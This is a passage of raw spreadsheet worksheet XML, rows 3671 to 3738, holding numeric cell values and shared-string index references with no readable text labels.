        <v>3471</v>
      </c>
      <c r="D3671" s="2">
        <v>1.0</v>
      </c>
      <c r="E3671" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3671" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3672" ht="15.75" customHeight="1">
      <c r="A3672" s="1">
        <v>3498.0</v>
      </c>
      <c r="B3672" s="2">
        <v>3.8477848E7</v>
      </c>
      <c r="C3672" s="2" t="s">
        <v>3472</v>
      </c>
      <c r="D3672" s="2">
        <v>1.0</v>
      </c>
      <c r="E3672" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3672" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3673" ht="15.75" customHeight="1">
      <c r="A3673" s="1">
        <v>4068.0</v>
      </c>
      <c r="B3673" s="2">
        <v>4.1164147E7</v>
      </c>
      <c r="C3673" s="2" t="s">
        <v>3473</v>
      </c>
      <c r="D3673" s="2">
        <v>1.0</v>
      </c>
      <c r="E3673" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3673" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3674" ht="15.75" customHeight="1">
      <c r="A3674" s="1">
        <v>4246.0</v>
      </c>
      <c r="B3674" s="2">
        <v>4.1801813E7</v>
      </c>
      <c r="C3674" s="2" t="s">
        <v>3474</v>
      </c>
      <c r="D3674" s="2">
        <v>1.0</v>
      </c>
      <c r="E3674" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3674" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3675" ht="15.75" customHeight="1">
      <c r="A3675" s="1">
        <v>4364.0</v>
      </c>
      <c r="B3675" s="2">
        <v>4.2122553E7</v>
      </c>
      <c r="C3675" s="2" t="s">
        <v>3475</v>
      </c>
      <c r="D3675" s="2">
        <v>1.0</v>
      </c>
      <c r="E3675" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3675" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3676" ht="15.75" customHeight="1">
      <c r="A3676" s="1">
        <v>4421.0</v>
      </c>
      <c r="B3676" s="2">
        <v>4.2305373E7</v>
      </c>
      <c r="C3676" s="2" t="s">
        <v>3476</v>
      </c>
      <c r="D3676" s="2">
        <v>1.0</v>
      </c>
      <c r="E3676" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3676" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3677" ht="15.75" customHeight="1">
      <c r="A3677" s="1">
        <v>4456.0</v>
      </c>
      <c r="B3677" s="2">
        <v>4.2415913E7</v>
      </c>
      <c r="C3677" s="2" t="s">
        <v>3477</v>
      </c>
      <c r="D3677" s="2">
        <v>1.0</v>
      </c>
      <c r="E3677" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3677" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3678" ht="15.75" customHeight="1">
      <c r="A3678" s="1">
        <v>4842.0</v>
      </c>
      <c r="B3678" s="2">
        <v>4.3687823E7</v>
      </c>
      <c r="C3678" s="2" t="s">
        <v>3478</v>
      </c>
      <c r="D3678" s="2">
        <v>1.0</v>
      </c>
      <c r="E3678" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3678" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3679" ht="15.75" customHeight="1">
      <c r="A3679" s="1">
        <v>4938.0</v>
      </c>
      <c r="B3679" s="2">
        <v>4.4007224E7</v>
      </c>
      <c r="C3679" s="2" t="s">
        <v>3479</v>
      </c>
      <c r="D3679" s="2">
        <v>1.0</v>
      </c>
      <c r="E3679" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3679" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3680" ht="15.75" customHeight="1">
      <c r="A3680" s="1">
        <v>5242.0</v>
      </c>
      <c r="B3680" s="2">
        <v>4.5041725E7</v>
      </c>
      <c r="C3680" s="2" t="s">
        <v>3480</v>
      </c>
      <c r="D3680" s="2">
        <v>1.0</v>
      </c>
      <c r="E3680" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3680" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3681" ht="15.75" customHeight="1">
      <c r="A3681" s="1">
        <v>5262.0</v>
      </c>
      <c r="B3681" s="2">
        <v>4.5116954E7</v>
      </c>
      <c r="C3681" s="2" t="s">
        <v>3481</v>
      </c>
      <c r="D3681" s="2">
        <v>1.0</v>
      </c>
      <c r="E3681" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3681" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3682" ht="15.75" customHeight="1">
      <c r="A3682" s="1">
        <v>5353.0</v>
      </c>
      <c r="B3682" s="2">
        <v>4.5364877E7</v>
      </c>
      <c r="C3682" s="2" t="s">
        <v>3482</v>
      </c>
      <c r="D3682" s="2">
        <v>1.0</v>
      </c>
      <c r="E3682" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3682" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3683" ht="15.75" customHeight="1">
      <c r="A3683" s="1">
        <v>5452.0</v>
      </c>
      <c r="B3683" s="2">
        <v>4.5657531E7</v>
      </c>
      <c r="C3683" s="2" t="s">
        <v>3483</v>
      </c>
      <c r="D3683" s="2">
        <v>1.0</v>
      </c>
      <c r="E3683" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3683" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3684" ht="15.75" customHeight="1">
      <c r="A3684" s="1">
        <v>5848.0</v>
      </c>
      <c r="B3684" s="2">
        <v>4.6929975E7</v>
      </c>
      <c r="C3684" s="2" t="s">
        <v>3484</v>
      </c>
      <c r="D3684" s="2">
        <v>1.0</v>
      </c>
      <c r="E3684" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3684" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3685" ht="15.75" customHeight="1">
      <c r="A3685" s="1">
        <v>5886.0</v>
      </c>
      <c r="B3685" s="2">
        <v>4.7077843E7</v>
      </c>
      <c r="C3685" s="2" t="s">
        <v>3485</v>
      </c>
      <c r="D3685" s="2">
        <v>1.0</v>
      </c>
      <c r="E3685" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3685" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3686" ht="15.75" customHeight="1">
      <c r="A3686" s="1">
        <v>5894.0</v>
      </c>
      <c r="B3686" s="2">
        <v>4.7098851E7</v>
      </c>
      <c r="C3686" s="2" t="s">
        <v>3486</v>
      </c>
      <c r="D3686" s="2">
        <v>1.0</v>
      </c>
      <c r="E3686" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3686" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3687" ht="15.75" customHeight="1">
      <c r="A3687" s="1">
        <v>6747.0</v>
      </c>
      <c r="B3687" s="2">
        <v>4.938025E7</v>
      </c>
      <c r="C3687" s="2" t="s">
        <v>3487</v>
      </c>
      <c r="D3687" s="2">
        <v>1.0</v>
      </c>
      <c r="E3687" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3687" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3688" ht="15.75" customHeight="1">
      <c r="A3688" s="1">
        <v>6776.0</v>
      </c>
      <c r="B3688" s="2">
        <v>4.9444936E7</v>
      </c>
      <c r="C3688" s="2" t="s">
        <v>3488</v>
      </c>
      <c r="D3688" s="2">
        <v>1.0</v>
      </c>
      <c r="E3688" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3688" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3689" ht="15.75" customHeight="1">
      <c r="A3689" s="1">
        <v>7268.0</v>
      </c>
      <c r="B3689" s="2">
        <v>5.0771671E7</v>
      </c>
      <c r="C3689" s="2" t="s">
        <v>3489</v>
      </c>
      <c r="D3689" s="2">
        <v>1.0</v>
      </c>
      <c r="E3689" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3689" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3690" ht="15.75" customHeight="1">
      <c r="A3690" s="1">
        <v>7783.0</v>
      </c>
      <c r="B3690" s="2">
        <v>5.2191357E7</v>
      </c>
      <c r="C3690" s="2" t="s">
        <v>3490</v>
      </c>
      <c r="D3690" s="2">
        <v>1.0</v>
      </c>
      <c r="E3690" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3690" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3691" ht="15.75" customHeight="1">
      <c r="A3691" s="1">
        <v>7976.0</v>
      </c>
      <c r="B3691" s="2">
        <v>5.2711703E7</v>
      </c>
      <c r="C3691" s="2" t="s">
        <v>3491</v>
      </c>
      <c r="D3691" s="2">
        <v>1.0</v>
      </c>
      <c r="E3691" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3691" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3692" ht="15.75" customHeight="1">
      <c r="A3692" s="1">
        <v>8026.0</v>
      </c>
      <c r="B3692" s="2">
        <v>5.2813148E7</v>
      </c>
      <c r="C3692" s="2" t="s">
        <v>3492</v>
      </c>
      <c r="D3692" s="2">
        <v>1.0</v>
      </c>
      <c r="E3692" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3692" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3693" ht="15.75" customHeight="1">
      <c r="A3693" s="1">
        <v>8263.0</v>
      </c>
      <c r="B3693" s="2">
        <v>5.3427902E7</v>
      </c>
      <c r="C3693" s="2" t="s">
        <v>3493</v>
      </c>
      <c r="D3693" s="2">
        <v>1.0</v>
      </c>
      <c r="E3693" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3693" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3694" ht="15.75" customHeight="1">
      <c r="A3694" s="1">
        <v>8836.0</v>
      </c>
      <c r="B3694" s="2">
        <v>5.466562E7</v>
      </c>
      <c r="C3694" s="2" t="s">
        <v>3494</v>
      </c>
      <c r="D3694" s="2">
        <v>1.0</v>
      </c>
      <c r="E3694" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3694" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3695" ht="15.75" customHeight="1">
      <c r="A3695" s="1">
        <v>8998.0</v>
      </c>
      <c r="B3695" s="2">
        <v>5.4968139E7</v>
      </c>
      <c r="C3695" s="2" t="s">
        <v>3495</v>
      </c>
      <c r="D3695" s="2">
        <v>1.0</v>
      </c>
      <c r="E3695" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3695" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3696" ht="15.75" customHeight="1">
      <c r="A3696" s="1">
        <v>9205.0</v>
      </c>
      <c r="B3696" s="2">
        <v>5.5409526E7</v>
      </c>
      <c r="C3696" s="2" t="s">
        <v>3496</v>
      </c>
      <c r="D3696" s="2">
        <v>1.0</v>
      </c>
      <c r="E3696" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3696" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3697" ht="15.75" customHeight="1">
      <c r="A3697" s="1">
        <v>10330.0</v>
      </c>
      <c r="B3697" s="2">
        <v>5.7716471E7</v>
      </c>
      <c r="C3697" s="2" t="s">
        <v>3497</v>
      </c>
      <c r="D3697" s="2">
        <v>1.0</v>
      </c>
      <c r="E3697" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3697" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3698" ht="15.75" customHeight="1">
      <c r="A3698" s="1">
        <v>10465.0</v>
      </c>
      <c r="B3698" s="2">
        <v>1.0839714E7</v>
      </c>
      <c r="C3698" s="2" t="s">
        <v>3498</v>
      </c>
      <c r="D3698" s="2">
        <v>1.0</v>
      </c>
      <c r="E3698" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3698" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3699" ht="15.75" customHeight="1">
      <c r="A3699" s="1">
        <v>10725.0</v>
      </c>
      <c r="B3699" s="2">
        <v>1.516049E7</v>
      </c>
      <c r="C3699" s="2" t="s">
        <v>3499</v>
      </c>
      <c r="D3699" s="2">
        <v>1.0</v>
      </c>
      <c r="E3699" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3699" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3700" ht="15.75" customHeight="1">
      <c r="A3700" s="1">
        <v>10858.0</v>
      </c>
      <c r="B3700" s="2">
        <v>1.6309914E7</v>
      </c>
      <c r="C3700" s="2" t="s">
        <v>3500</v>
      </c>
      <c r="D3700" s="2">
        <v>1.0</v>
      </c>
      <c r="E3700" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3700" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3701" ht="15.75" customHeight="1">
      <c r="A3701" s="1">
        <v>11047.0</v>
      </c>
      <c r="B3701" s="2">
        <v>1.8152866E7</v>
      </c>
      <c r="C3701" s="2" t="s">
        <v>3501</v>
      </c>
      <c r="D3701" s="2">
        <v>1.0</v>
      </c>
      <c r="E3701" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3701" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3702" ht="15.75" customHeight="1">
      <c r="A3702" s="1">
        <v>11088.0</v>
      </c>
      <c r="B3702" s="2">
        <v>1.8489918E7</v>
      </c>
      <c r="C3702" s="2" t="s">
        <v>3502</v>
      </c>
      <c r="D3702" s="2">
        <v>1.0</v>
      </c>
      <c r="E3702" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3702" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3703" ht="15.75" customHeight="1">
      <c r="A3703" s="1">
        <v>11368.0</v>
      </c>
      <c r="B3703" s="2">
        <v>2.1383366E7</v>
      </c>
      <c r="C3703" s="5" t="s">
        <v>3503</v>
      </c>
      <c r="D3703" s="2">
        <v>1.0</v>
      </c>
      <c r="E3703" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3703" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3704" ht="15.75" customHeight="1">
      <c r="A3704" s="1">
        <v>11438.0</v>
      </c>
      <c r="B3704" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C3704" s="2" t="s">
        <v>3504</v>
      </c>
      <c r="D3704" s="2">
        <v>1.0</v>
      </c>
      <c r="E3704" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3704" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3705" ht="15.75" customHeight="1">
      <c r="A3705" s="1">
        <v>11519.0</v>
      </c>
      <c r="B3705" s="2">
        <v>2.2314819E7</v>
      </c>
      <c r="C3705" s="2" t="s">
        <v>3505</v>
      </c>
      <c r="D3705" s="2">
        <v>1.0</v>
      </c>
      <c r="E3705" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3705" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3706" ht="15.75" customHeight="1">
      <c r="A3706" s="1">
        <v>11646.0</v>
      </c>
      <c r="B3706" s="2">
        <v>2.3223567E7</v>
      </c>
      <c r="C3706" s="2" t="s">
        <v>3506</v>
      </c>
      <c r="D3706" s="2">
        <v>1.0</v>
      </c>
      <c r="E3706" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3706" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3707" ht="15.75" customHeight="1">
      <c r="A3707" s="1">
        <v>12145.0</v>
      </c>
      <c r="B3707" s="2">
        <v>2.7111956E7</v>
      </c>
      <c r="C3707" s="2" t="s">
        <v>3507</v>
      </c>
      <c r="D3707" s="2">
        <v>1.0</v>
      </c>
      <c r="E3707" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3707" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3708" ht="15.75" customHeight="1">
      <c r="A3708" s="1">
        <v>12266.0</v>
      </c>
      <c r="B3708" s="2">
        <v>2.8038756E7</v>
      </c>
      <c r="C3708" s="2" t="s">
        <v>3508</v>
      </c>
      <c r="D3708" s="2">
        <v>1.0</v>
      </c>
      <c r="E3708" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3708" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3709" ht="15.75" customHeight="1">
      <c r="A3709" s="1">
        <v>12276.0</v>
      </c>
      <c r="B3709" s="2">
        <v>2.815231E7</v>
      </c>
      <c r="C3709" s="2" t="s">
        <v>3509</v>
      </c>
      <c r="D3709" s="2">
        <v>1.0</v>
      </c>
      <c r="E3709" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3709" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3710" ht="15.75" customHeight="1">
      <c r="A3710" s="1">
        <v>12430.0</v>
      </c>
      <c r="B3710" s="2">
        <v>2.9198602E7</v>
      </c>
      <c r="C3710" s="2" t="s">
        <v>3510</v>
      </c>
      <c r="D3710" s="2">
        <v>1.0</v>
      </c>
      <c r="E3710" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3710" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3711" ht="15.75" customHeight="1">
      <c r="A3711" s="1">
        <v>12520.0</v>
      </c>
      <c r="B3711" s="2">
        <v>2.9697223E7</v>
      </c>
      <c r="C3711" s="2" t="s">
        <v>3511</v>
      </c>
      <c r="D3711" s="2">
        <v>1.0</v>
      </c>
      <c r="E3711" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3711" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3712" ht="15.75" customHeight="1">
      <c r="A3712" s="1">
        <v>13616.0</v>
      </c>
      <c r="B3712" s="2">
        <v>3.585704E7</v>
      </c>
      <c r="C3712" s="2" t="s">
        <v>3512</v>
      </c>
      <c r="D3712" s="2">
        <v>1.0</v>
      </c>
      <c r="E3712" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3712" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3713" ht="15.75" customHeight="1">
      <c r="A3713" s="1">
        <v>15254.0</v>
      </c>
      <c r="B3713" s="2">
        <v>4.2299966E7</v>
      </c>
      <c r="C3713" s="2" t="s">
        <v>3513</v>
      </c>
      <c r="D3713" s="2">
        <v>1.0</v>
      </c>
      <c r="E3713" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3713" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3714" ht="15.75" customHeight="1">
      <c r="A3714" s="1">
        <v>15465.0</v>
      </c>
      <c r="B3714" s="2">
        <v>4.3115908E7</v>
      </c>
      <c r="C3714" s="2" t="s">
        <v>3514</v>
      </c>
      <c r="D3714" s="2">
        <v>1.0</v>
      </c>
      <c r="E3714" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3714" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3715" ht="15.75" customHeight="1">
      <c r="A3715" s="1">
        <v>15488.0</v>
      </c>
      <c r="B3715" s="2">
        <v>4319355.0</v>
      </c>
      <c r="C3715" s="2" t="s">
        <v>3515</v>
      </c>
      <c r="D3715" s="2">
        <v>1.0</v>
      </c>
      <c r="E3715" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3715" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3716" ht="15.75" customHeight="1">
      <c r="A3716" s="1">
        <v>15648.0</v>
      </c>
      <c r="B3716" s="2">
        <v>4.361436E7</v>
      </c>
      <c r="C3716" s="2" t="s">
        <v>3516</v>
      </c>
      <c r="D3716" s="2">
        <v>1.0</v>
      </c>
      <c r="E3716" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3716" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3717" ht="15.75" customHeight="1">
      <c r="A3717" s="1">
        <v>15739.0</v>
      </c>
      <c r="B3717" s="2">
        <v>4.4092589E7</v>
      </c>
      <c r="C3717" s="2" t="s">
        <v>3517</v>
      </c>
      <c r="D3717" s="2">
        <v>1.0</v>
      </c>
      <c r="E3717" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3717" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3718" ht="15.75" customHeight="1">
      <c r="A3718" s="1">
        <v>15740.0</v>
      </c>
      <c r="B3718" s="2">
        <v>4.4092589E7</v>
      </c>
      <c r="C3718" s="2" t="s">
        <v>3518</v>
      </c>
      <c r="D3718" s="2">
        <v>1.0</v>
      </c>
      <c r="E3718" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3718" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3719" ht="15.75" customHeight="1">
      <c r="A3719" s="1">
        <v>15751.0</v>
      </c>
      <c r="B3719" s="2">
        <v>4.4135263E7</v>
      </c>
      <c r="C3719" s="2" t="s">
        <v>3519</v>
      </c>
      <c r="D3719" s="2">
        <v>1.0</v>
      </c>
      <c r="E3719" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3719" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3720" ht="15.75" customHeight="1">
      <c r="A3720" s="1">
        <v>16130.0</v>
      </c>
      <c r="B3720" s="2">
        <v>4.551252E7</v>
      </c>
      <c r="C3720" s="2" t="s">
        <v>3520</v>
      </c>
      <c r="D3720" s="2">
        <v>1.0</v>
      </c>
      <c r="E3720" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3720" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3721" ht="15.75" customHeight="1">
      <c r="A3721" s="1">
        <v>17641.0</v>
      </c>
      <c r="B3721" s="2">
        <v>5.04015E7</v>
      </c>
      <c r="C3721" s="2" t="s">
        <v>3521</v>
      </c>
      <c r="D3721" s="2">
        <v>1.0</v>
      </c>
      <c r="E3721" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3721" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3722" ht="15.75" customHeight="1">
      <c r="A3722" s="1">
        <v>18119.0</v>
      </c>
      <c r="B3722" s="2">
        <v>5176515.0</v>
      </c>
      <c r="C3722" s="2" t="s">
        <v>3522</v>
      </c>
      <c r="D3722" s="2">
        <v>1.0</v>
      </c>
      <c r="E3722" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3722" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3723" ht="15.75" customHeight="1">
      <c r="A3723" s="1">
        <v>18157.0</v>
      </c>
      <c r="B3723" s="2">
        <v>5.1888881E7</v>
      </c>
      <c r="C3723" s="2" t="s">
        <v>3523</v>
      </c>
      <c r="D3723" s="2">
        <v>1.0</v>
      </c>
      <c r="E3723" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3723" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3724" ht="15.75" customHeight="1">
      <c r="A3724" s="1">
        <v>18343.0</v>
      </c>
      <c r="B3724" s="2">
        <v>5.2447178E7</v>
      </c>
      <c r="C3724" s="2" t="s">
        <v>3524</v>
      </c>
      <c r="D3724" s="2">
        <v>1.0</v>
      </c>
      <c r="E3724" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3724" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3725" ht="15.75" customHeight="1">
      <c r="A3725" s="1">
        <v>18436.0</v>
      </c>
      <c r="B3725" s="2">
        <v>5.2744938E7</v>
      </c>
      <c r="C3725" s="2" t="s">
        <v>3525</v>
      </c>
      <c r="D3725" s="2">
        <v>1.0</v>
      </c>
      <c r="E3725" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3725" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3726" ht="15.75" customHeight="1">
      <c r="A3726" s="1">
        <v>18632.0</v>
      </c>
      <c r="B3726" s="2">
        <v>5.3383622E7</v>
      </c>
      <c r="C3726" s="2" t="s">
        <v>3526</v>
      </c>
      <c r="D3726" s="2">
        <v>1.0</v>
      </c>
      <c r="E3726" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3726" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3727" ht="15.75" customHeight="1">
      <c r="A3727" s="1">
        <v>19039.0</v>
      </c>
      <c r="B3727" s="2">
        <v>5.4562762E7</v>
      </c>
      <c r="C3727" s="2" t="s">
        <v>3527</v>
      </c>
      <c r="D3727" s="2">
        <v>1.0</v>
      </c>
      <c r="E3727" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3727" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3728" ht="15.75" customHeight="1">
      <c r="A3728" s="1">
        <v>19752.0</v>
      </c>
      <c r="B3728" s="2">
        <v>5.6705061E7</v>
      </c>
      <c r="C3728" s="2" t="s">
        <v>3528</v>
      </c>
      <c r="D3728" s="2">
        <v>1.0</v>
      </c>
      <c r="E3728" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3728" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3729" ht="15.75" customHeight="1">
      <c r="A3729" s="1">
        <v>21824.0</v>
      </c>
      <c r="B3729" s="2">
        <v>2.6949547E7</v>
      </c>
      <c r="C3729" s="2" t="s">
        <v>3529</v>
      </c>
      <c r="D3729" s="2">
        <v>1.0</v>
      </c>
      <c r="E3729" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3729" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3730" ht="15.75" customHeight="1">
      <c r="A3730" s="1">
        <v>24066.0</v>
      </c>
      <c r="B3730" s="2">
        <v>9627708.0</v>
      </c>
      <c r="C3730" s="2" t="s">
        <v>3530</v>
      </c>
      <c r="D3730" s="2">
        <v>1.0</v>
      </c>
      <c r="E3730" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3730" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3731" ht="15.75" customHeight="1">
      <c r="A3731" s="1">
        <v>27498.0</v>
      </c>
      <c r="B3731" s="2">
        <v>2.2067601E7</v>
      </c>
      <c r="C3731" s="2" t="s">
        <v>3531</v>
      </c>
      <c r="D3731" s="2">
        <v>1.0</v>
      </c>
      <c r="E3731" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3731" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3732" ht="15.75" customHeight="1">
      <c r="A3732" s="1">
        <v>28785.0</v>
      </c>
      <c r="B3732" s="2">
        <v>2.8474081E7</v>
      </c>
      <c r="C3732" s="2" t="s">
        <v>3532</v>
      </c>
      <c r="D3732" s="2">
        <v>1.0</v>
      </c>
      <c r="E3732" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3732" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3733" ht="15.75" customHeight="1">
      <c r="A3733" s="1">
        <v>29921.0</v>
      </c>
      <c r="B3733" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C3733" s="2" t="s">
        <v>3533</v>
      </c>
      <c r="D3733" s="2">
        <v>1.0</v>
      </c>
      <c r="E3733" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3733" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3734" ht="15.75" customHeight="1">
      <c r="A3734" s="1">
        <v>31061.0</v>
      </c>
      <c r="B3734" s="2">
        <v>4.801765E7</v>
      </c>
      <c r="C3734" s="2" t="s">
        <v>3534</v>
      </c>
      <c r="D3734" s="2">
        <v>1.0</v>
      </c>
      <c r="E3734" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3734" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3735" ht="15.75" customHeight="1">
      <c r="A3735" s="1">
        <v>33191.0</v>
      </c>
      <c r="B3735" s="2">
        <v>7129545.0</v>
      </c>
      <c r="C3735" s="2" t="s">
        <v>3534</v>
      </c>
      <c r="D3735" s="2">
        <v>1.0</v>
      </c>
      <c r="E3735" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3735" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3736" ht="15.75" customHeight="1">
      <c r="A3736" s="1">
        <v>3700.0</v>
      </c>
      <c r="B3736" s="2">
        <v>3.9551732E7</v>
      </c>
      <c r="C3736" s="2" t="s">
        <v>3535</v>
      </c>
      <c r="D3736" s="2">
        <v>1.0</v>
      </c>
      <c r="E3736" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3736" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="3737" ht="15.75" customHeight="1">
      <c r="A3737" s="1">
        <v>17588.0</v>
      </c>
      <c r="B3737" s="2">
        <v>5.0289392E7</v>
      </c>
      <c r="C3737" s="2" t="s">
        <v>3536</v>
      </c>
      <c r="D3737" s="2">
        <v>1.0</v>
      </c>
      <c r="E3737" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3737" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="3738" ht="15.75" customHeight="1">
      <c r="A3738" s="1">
        <v>18213.0</v>
      </c>
      <c r="B3738" s="2">
        <v>5.2067536E7</v>
      </c>
      <c r="C3738" s="2" t="s">
        <v>3537</v>
